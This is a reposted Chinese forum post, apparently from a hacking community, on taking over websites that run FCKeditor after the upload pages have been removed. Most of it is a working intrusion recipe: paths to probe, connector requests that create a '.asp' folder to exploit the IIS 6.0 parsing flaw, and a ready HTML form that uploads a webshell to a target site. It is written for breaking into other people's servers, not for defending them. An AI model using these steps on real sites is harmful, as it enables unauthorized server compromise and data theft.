[转]Fckeditor删除所有上传页面拿shell
今天准备拿个站aspx的 有fck
但是上传页面被删了 于是百度后找到了解决方法
不过悲剧的是IIS6.0的解析洞已经被补了
如果没补就按照下面的方法 搞
确定下Fckeditor的版本:
/FCKeditor/editor/dialog/fck_about.html
确定一下以下几个上传页面是否真的被删除了
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
如果都已经被删除了,确认下这些文件是否存在
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php
如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
1.查看Media目录下的文件:
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
2.利用iis解析漏洞创建1.asp特殊目录
fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=retxt.asp
有些站用上面的方法新建.asp文件夹失败请用下面的
/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Media&CurrentFolder=/retxt.asp&NewFolderName=z&uuid=1244789975684
3.构建表单,上传webshell到特殊目录
<form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fretxt.asp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,retxt.asp为特殊目录名。
上传之后的路径右键上传表单里有
如果访问之后发现无法访问,试着上传一张图片马
如果访问后看到了 你的图图
你和我一样悲剧了
管理员已经补上了IIS路径解析漏洞鸟
PS:无耻的说一下,鄙人博客求关注,求友链 http://txt3389.diandian.com/
页:
[1]